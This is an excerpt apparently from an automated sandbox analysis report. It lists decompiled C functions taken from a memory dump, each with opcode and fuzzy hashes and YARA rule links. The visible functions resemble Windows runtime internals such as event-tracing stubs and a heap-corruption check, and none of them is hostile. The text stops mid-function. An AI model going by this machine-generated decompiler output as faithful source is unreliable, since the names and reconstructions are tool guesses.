                                                                                                                                    • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                    • Instruction Fuzzy Hash: 1E017C723049909FD726CB6DC988F6677D8EB85754F0900E1FA19CBAA1EA68FC40D620
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04C01074, Relevance: .0, Instructions: 46COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04C01074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E04C0165E(__ebx, 0x4c28ae4, (__edx -  *0x4c28b04 >> 0x14) + (__edx -  *0x4c28b04 >> 0x14), __edi, __ecx, (__edx -  *0x4c28b04 >> 0x14) + (__edx -  *0x4c28b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E04BFAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04B57D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E04BEFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                                                                                    0x04c01074
                                                                                                                                    0x04c01080
                                                                                                                                    0x04c01082
                                                                                                                                    0x04c0108a
                                                                                                                                    0x04c0108f
                                                                                                                                    0x04c01093
                                                                                                                                    0x04c010ab
                                                                                                                                    0x04c010ab
                                                                                                                                    0x04c010c3
                                                                                                                                    0x04c010cf
                                                                                                                                    0x04c010e1
                                                                                                                                    0x04c010d1
                                                                                                                                    0x04c010da
                                                                                                                                    0x04c010da
                                                                                                                                    0x04c010e9
                                                                                                                                    0x04c010f5
                                                                                                                                    0x04c010f5
                                                                                                                                    0x04c010fe

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: da5778a5614de0cacff32634424e7fdd0ec4c2a18f8b6ca02ea5806a34ef00b8
                                                                                                                                    • Instruction ID: 90b03f4e5f337abd9295bda5e21075b1c0683a56e1e11ac8f58d1d769701b75b
                                                                                                                                    • Opcode Fuzzy Hash: da5778a5614de0cacff32634424e7fdd0ec4c2a18f8b6ca02ea5806a34ef00b8
                                                                                                                                    • Instruction Fuzzy Hash: 62012872604741ABD710EF29C940B1AB7D6AB84318F08C629F885836D0EE72F940CBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04BEFEC0, Relevance: .0, Instructions: 46COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                    			E04BEFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4c2d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04B7FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04B57D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04B7B640(E04B79AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                    0x04befec0
                                                                                                                                    0x04befec0
                                                                                                                                    0x04befecf
                                                                                                                                    0x04befed9
                                                                                                                                    0x04befede
                                                                                                                                    0x04befee0
                                                                                                                                    0x04befeeb
                                                                                                                                    0x04befef3
                                                                                                                                    0x04befef6
                                                                                                                                    0x04befef9
                                                                                                                                    0x04beff04
                                                                                                                                    0x04beff16
                                                                                                                                    0x04beff06
                                                                                                                                    0x04beff0f
                                                                                                                                    0x04beff0f
                                                                                                                                    0x04beff21
                                                                                                                                    0x04beff22
                                                                                                                                    0x04beff24
                                                                                                                                    0x04beff29
                                                                                                                                    0x04beff3e

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c47d9bc5acab97e4e5931cec04297eb515c57c6657357bdcd599a8246cb36df3
                                                                                                                                    • Instruction ID: 72c223a3ee57c836d94cb956fce707d38b425946a7deefd336a3859b29faa8b6
                                                                                                                                    • Opcode Fuzzy Hash: c47d9bc5acab97e4e5931cec04297eb515c57c6657357bdcd599a8246cb36df3
                                                                                                                                    • Instruction Fuzzy Hash: 17017171A01208ABDB14DBA9D845BBEB7B8EF44714F0040A6F911AB291EA74EA01C794
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04BEFE3F, Relevance: .0, Instructions: 46COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                    			E04BEFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4c2d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04B7FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04B57D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04B7B640(E04B79AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                    0x04befe3f
                                                                                                                                    0x04befe3f
                                                                                                                                    0x04befe4e
                                                                                                                                    0x04befe58
                                                                                                                                    0x04befe5d
                                                                                                                                    0x04befe5f
                                                                                                                                    0x04befe6a
                                                                                                                                    0x04befe72
                                                                                                                                    0x04befe75
                                                                                                                                    0x04befe78
                                                                                                                                    0x04befe83
                                                                                                                                    0x04befe95
                                                                                                                                    0x04befe85
                                                                                                                                    0x04befe8e
                                                                                                                                    0x04befe8e
                                                                                                                                    0x04befea0
                                                                                                                                    0x04befea1
                                                                                                                                    0x04befea3
                                                                                                                                    0x04befea8
                                                                                                                                    0x04befebd

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 55be82b7089fc1aeabf5aefcae82b45031efad3f4ee63f2d137578fce7a94c2b
                                                                                                                                    • Instruction ID: b202593cfcb796eb8fe4fc80b7dd90c00eae40de6be7cc710ae4fa15264ce8f5
                                                                                                                                    • Opcode Fuzzy Hash: 55be82b7089fc1aeabf5aefcae82b45031efad3f4ee63f2d137578fce7a94c2b
                                                                                                                                    • Instruction Fuzzy Hash: B0018471E01208AFDB14DFA9D845FBEB7B8EF44714F0040A6F911AB291DA74EA01C794
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04C08ED6, Relevance: .0, Instructions: 44COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                    			E04C08ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x4c2d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04B57D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E04B7B640(E04B79AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                                                                                    0x04c08ed6
                                                                                                                                    0x04c08ee5
                                                                                                                                    0x04c08eed
                                                                                                                                    0x04c08ef0
                                                                                                                                    0x04c08efa
                                                                                                                                    0x04c08f03
                                                                                                                                    0x04c08f0c
                                                                                                                                    0x04c08f15
                                                                                                                                    0x04c08f24
                                                                                                                                    0x04c08f27
                                                                                                                                    0x04c08f31
                                                                                                                                    0x04c08f43
                                                                                                                                    0x04c08f33
                                                                                                                                    0x04c08f3c
                                                                                                                                    0x04c08f3c
                                                                                                                                    0x04c08f4e
                                                                                                                                    0x04c08f4f
                                                                                                                                    0x04c08f51
                                                                                                                                    0x04c08f56
                                                                                                                                    0x04c08f69

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 78c7cba260d0c678e4458a00f5951926619d1dcb2271ad29eca14b4f62c87537
                                                                                                                                    • Instruction ID: cbf9b5bd3a85820878c151701e1f0828d332e2f1065b386edcdb9108acbc72e1
                                                                                                                                    • Opcode Fuzzy Hash: 78c7cba260d0c678e4458a00f5951926619d1dcb2271ad29eca14b4f62c87537
                                                                                                                                    • Instruction Fuzzy Hash: D8110070A002099FD704DFA9D541BAEF7F4FB08304F1482A6E519EB381E634A940CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B3B1E1, Relevance: .0, Instructions: 42COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B3B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04B57D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04B57D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04BB7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                                                                    0x04b3b1e8
                                                                                                                                    0x04b3b1ea
                                                                                                                                    0x04b3b1f3
                                                                                                                                    0x04b94a17
                                                                                                                                    0x04b3b1f9
                                                                                                                                    0x04b3b1f9
                                                                                                                                    0x04b3b1f9
                                                                                                                                    0x04b3b201
                                                                                                                                    0x04b94a21
                                                                                                                                    0x04b94a2e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b94a3b
                                                                                                                                    0x04b94a4d
                                                                                                                                    0x04b94a3d
                                                                                                                                    0x04b94a46
                                                                                                                                    0x04b94a46
                                                                                                                                    0x04b94a55
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b3b20a
                                                                                                                                    0x04b3b20a
                                                                                                                                    0x04b3b20a
                                                                                                                                    0x04b3b20a

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                    • Instruction ID: 0e259174c682912a5d33064a7037ed23b4b172eb535d4d59581aec1007a24b4d
                                                                                                                                    • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                    • Instruction Fuzzy Hash: E60186323089849BDB229B5AC804F69BBD9EF41754F0940F2F9148B6B6EA75FC01D615
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04BCFE87, Relevance: .0, Instructions: 38COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                    			E04BCFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x4c2d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04B57D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04B7B640(E04B79AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                                                                                    0x04bcfe96
                                                                                                                                    0x04bcfe9e
                                                                                                                                    0x04bcfea1
                                                                                                                                    0x04bcfead
                                                                                                                                    0x04bcfeb3
                                                                                                                                    0x04bcfeb9
                                                                                                                                    0x04bcfec3
                                                                                                                                    0x04bcfed5
                                                                                                                                    0x04bcfec5
                                                                                                                                    0x04bcfece
                                                                                                                                    0x04bcfece
                                                                                                                                    0x04bcfee0
                                                                                                                                    0x04bcfee1
                                                                                                                                    0x04bcfee3
                                                                                                                                    0x04bcfee8
                                                                                                                                    0x04bcfefb

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5e7f1564f76fa3047c38f605c1db4c43681149eb474fb952053cde079446ee53
                                                                                                                                    • Instruction ID: 179f4e725ad3a968eb61200eaf9e27c977e07a0fd7c14a10a7cf42f2bd055b81
                                                                                                                                    • Opcode Fuzzy Hash: 5e7f1564f76fa3047c38f605c1db4c43681149eb474fb952053cde079446ee53
                                                                                                                                    • Instruction Fuzzy Hash: F5016270A00209EFDB14DFA8D542A6EB7F4EF04304F1045A9B919DB382DA35EA01CB80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04BF131B, Relevance: .0, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                    			E04BF131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4c2d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04B57D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04B7B640(E04B79AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                                                    0x04bf131b
                                                                                                                                    0x04bf132a
                                                                                                                                    0x04bf1330
                                                                                                                                    0x04bf1336
                                                                                                                                    0x04bf133e
                                                                                                                                    0x04bf1341
                                                                                                                                    0x04bf1344
                                                                                                                                    0x04bf134f
                                                                                                                                    0x04bf1361
                                                                                                                                    0x04bf1351
                                                                                                                                    0x04bf135a
                                                                                                                                    0x04bf135a
                                                                                                                                    0x04bf136c
                                                                                                                                    0x04bf136d
                                                                                                                                    0x04bf136f
                                                                                                                                    0x04bf1374
                                                                                                                                    0x04bf1387

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 025a54eb42701831aa759616aff46e080c5170f53bab6f925ddc6a90c53e4c28
                                                                                                                                    • Instruction ID: abebfdab42f529b83ec5883900e687f9c753d9aa6229e41602f1ec57342537b9
                                                                                                                                    • Opcode Fuzzy Hash: 025a54eb42701831aa759616aff46e080c5170f53bab6f925ddc6a90c53e4c28
                                                                                                                                    • Instruction Fuzzy Hash: DA013171A01208AFDB04EFA9D545AAEB7F4FF08700F104099F955EB391EA74EA00CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04C08F6A, Relevance: .0, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                    			E04C08F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4c2d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04B57D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E04B7B640(E04B79AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                                                    0x04c08f6a
                                                                                                                                    0x04c08f79
                                                                                                                                    0x04c08f81
                                                                                                                                    0x04c08f84
                                                                                                                                    0x04c08f8b
                                                                                                                                    0x04c08f91
                                                                                                                                    0x04c08f94
                                                                                                                                    0x04c08f9e
                                                                                                                                    0x04c08fb0
                                                                                                                                    0x04c08fa0
                                                                                                                                    0x04c08fa9
                                                                                                                                    0x04c08fa9
                                                                                                                                    0x04c08fbb
                                                                                                                                    0x04c08fbc
                                                                                                                                    0x04c08fbe
                                                                                                                                    0x04c08fc3
                                                                                                                                    0x04c08fd6

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7d10645bd3be309f7072985c19b78eb53adbba4586a1ca203016729488d672eb
                                                                                                                                    • Instruction ID: db9d0f473958847b3f2a0b1e1489873481f603ea03a5a837d1c86671a2d96a6c
                                                                                                                                    • Opcode Fuzzy Hash: 7d10645bd3be309f7072985c19b78eb53adbba4586a1ca203016729488d672eb
                                                                                                                                    • Instruction Fuzzy Hash: 15014474A0120CAFDB04EFB8D545AAEB7F4EF08704F108099F915EB380EA74EA00DB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B5C577, Relevance: .0, Instructions: 33COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B5C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04B5C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4b111cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E04C088F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                                                                    0x04b5c577
                                                                                                                                    0x04b5c57d
                                                                                                                                    0x04b5c581
                                                                                                                                    0x04b5c5b5
                                                                                                                                    0x04b5c5b9
                                                                                                                                    0x04b5c5ce
                                                                                                                                    0x04b5c5ce
                                                                                                                                    0x04b5c5ca
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5c5ca
                                                                                                                                    0x04b5c5c4
                                                                                                                                    0x04b5c5c8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5c5ad
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5c5af

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 47fbe90f27d2383aaac4cf3fe448ddb71a63cc1217a2c87ca16d94da8d215c5c
                                                                                                                                    • Instruction ID: 1a0ff9109d5ee32516ccc466f25f898ddff0a939b262c98d845f77f773e436bf
                                                                                                                                    • Opcode Fuzzy Hash: 47fbe90f27d2383aaac4cf3fe448ddb71a63cc1217a2c87ca16d94da8d215c5c
                                                                                                                                    • Instruction Fuzzy Hash: AAF090B29157909EE7319B98A005B22FFF6DB05778F4484E6DE0687172C7A4F880C351
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04BF2073, Relevance: .0, Instructions: 32COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E04BF2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E04BEFD22(__ecx);
				_t19 =  *0x4c2849c - _t3; // 0x57ff1730
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4c28748; // 0x0
					if(__eflags <= 0) {
						E04BF1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4c28724 & 0x00000004;
							if(( *0x4c28724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4c28724; // 0x0
					return E04BE8DF1(__ebx, 0xc0000374, 0x4c25890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                                                                    0x04bf2076
                                                                                                                                    0x04bf2078
                                                                                                                                    0x04bf207d
                                                                                                                                    0x04bf2083
                                                                                                                                    0x04bf20a4
                                                                                                                                    0x04bf20aa
                                                                                                                                    0x04bf20ac
                                                                                                                                    0x04bf20b7
                                                                                                                                    0x04bf20ba
                                                                                                                                    0x04bf20bc
                                                                                                                                    0x04bf20c9
                                                                                                                                    0x04bf20c9
                                                                                                                                    0x04bf20d0
                                                                                                                                    0x04bf20d2
                                                                                                                                    0x00000000
                                                                                                                                    0x04bf20d2
                                                                                                                                    0x04bf20be
                                                                                                                                    0x04bf20c3
                                                                                                                                    0x04bf20c5
                                                                                                                                    0x04bf20c7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04bf20c7
                                                                                                                                    0x04bf20bc
                                                                                                                                    0x04bf20d4
                                                                                                                                    0x04bf2085
                                                                                                                                    0x04bf2085
                                                                                                                                    0x04bf20a3
                                                                                                                                    0x04bf20a3

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7d60ee447beeeb3cdeee179914cf287c1443fc4ce697941a687d83eb4f85e39e
                                                                                                                                    • Instruction ID: 980b5cd37186daf14b3825ece824b9dff978b722b0c4fa41ee937e31ad59724d
                                                                                                                                    • Opcode Fuzzy Hash: 7d60ee447beeeb3cdeee179914cf287c1443fc4ce697941a687d83eb4f85e39e
                                                                                                                                    • Instruction Fuzzy Hash: BDF0276B4215844BFF3ABF397A003E16B90C785114B4944C5EE9457204C9BFAC87DB20
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04C08D34, Relevance: .0, Instructions: 32COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 43%
                                                                                                                                    			E04C08D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
